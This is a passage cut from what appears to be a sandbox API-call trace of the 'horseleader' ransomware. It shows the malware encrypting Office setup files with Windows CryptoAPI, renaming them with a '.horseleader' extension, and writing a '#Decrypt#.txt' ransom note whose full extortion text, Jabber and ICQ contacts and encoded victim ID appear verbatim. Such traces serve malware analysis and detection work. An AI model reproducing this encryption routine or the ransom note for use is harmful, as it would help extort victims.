hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.381] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.381] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.381] CloseHandle (hObject=0x15c) returned 1 [0244.381] GetProcessHeap () returned 0x780000 [0244.381] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.381] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.horseleader") returned 117 [0244.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.horseleader")) returned 1 [0244.382] GetProcessHeap () returned 0x780000 [0244.382] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.382] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.382] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.382] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\#Decrypt#.txt") returned 109 [0244.382] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.395] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.395] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.397] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.397] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.397] CloseHandle (hObject=0x1a4) returned 1 [0244.397] GetProcessHeap () returned 0x780000 [0244.397] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0244.397] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Groove.en-us", cAlternateFileName="GROOVE~1.EN-")) returned 1 [0244.397] lstrcmpiW (lpString1="Groove.en-us", lpString2="Windows") returned -1 [0244.397] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us") returned 96 [0244.397] lstrcmpW (lpString1="Groove.en-us", lpString2=".") returned 1 [0244.397] lstrcmpW (lpString1="Groove.en-us", lpString2="..") returned 1 [0244.398] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.398] GetProcessHeap () returned 0x780000 [0244.398] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0244.398] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\*") returned 98 [0244.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.399] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.399] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\.") returned 98 [0244.399] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.399] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="..", cAlternateFileName="")) returned 1 [0244.399] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.399] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\..") returned 99 [0244.399] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.399] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.399] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd658ff0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="GrooveMUI.XML", cAlternateFileName="GROOVE~1.XML")) returned 1 [0244.399] lstrcmpiW (lpString1="GrooveMUI.XML", lpString2="Windows") returned -1 [0244.399] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 110 [0244.399] StrStrIW (lpFirst="GrooveMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.399] lstrcmpW (lpString1="GrooveMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.400] lstrcmpW (lpString1="GrooveMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.400] lstrlenW (lpString=".testttjffg") returned 11 [0244.400] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.400] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.400] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.400] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.400] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 110 [0244.400] StrStrW (lpFirst="GrooveMUI.XML", lpSrch=".txt") returned 0x0 [0244.401] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=913) returned 1 [0244.401] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x391, lpOverlapped=0x0) returned 1 [0244.402] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffc6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.403] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x391, lpOverlapped=0x0) returned 1 [0244.403] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.403] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.403] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.403] CloseHandle (hObject=0x15c) returned 1 [0244.403] GetProcessHeap () returned 0x780000 [0244.404] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.404] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.horseleader") returned 122 [0244.404] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.horseleader")) returned 1 [0244.404] GetProcessHeap () returned 0x780000 [0244.404] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.405] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee803530, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.405] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.405] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 106 [0244.405] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.405] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.405] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.405] lstrlenW (lpString=".testttjffg") returned 11 [0244.405] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.405] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.405] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.405] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.406] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML") returned 106 [0244.406] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.406] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1452) returned 1 [0244.406] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5ac, lpOverlapped=0x0) returned 1 [0244.408] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.409] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5ac, lpOverlapped=0x0) returned 1 [0244.409] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.409] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.409] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.409] CloseHandle (hObject=0x15c) returned 1 [0244.412] GetProcessHeap () returned 0x780000 [0244.412] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.412] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.horseleader") returned 118 [0244.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.horseleader")) returned 1 [0244.413] GetProcessHeap () returned 0x780000 [0244.413] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.413] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee803530, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="SETUP.XML", cAlternateFileName="")) returned 0 [0244.413] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.413] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\#Decrypt#.txt") returned 110 [0244.414] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.417] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.417] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.418] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0244.418] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.418] CloseHandle (hObject=0x1a4) returned 1 [0244.418] GetProcessHeap () returned 0x780000 [0244.418] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0244.418] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, 